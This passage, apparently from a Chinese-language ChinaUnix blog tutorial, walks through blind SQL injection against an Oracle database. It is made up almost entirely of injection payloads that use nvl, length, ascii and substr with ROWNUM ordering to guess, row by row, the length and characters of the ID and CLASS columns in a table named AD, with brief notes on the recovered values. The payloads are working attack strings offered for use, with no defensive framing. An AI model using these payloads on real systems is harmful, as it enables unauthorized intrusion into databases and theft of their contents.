And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))



 第二行第一列记录的长度为:1,值为:2

And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 49>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 50=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))



 第二行第二列记录的长度为:1,值为:2

And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 49>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 50=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))



 猜解第三个记录的长度为:(其它记录依次类推)

And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

阅读(731) | 评论(0) | 转发(0) |
0

上一篇:解析Cookie欺骗实现过程及具体应用

下一篇:教你六项急救措施 拯救受损Windows系统

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6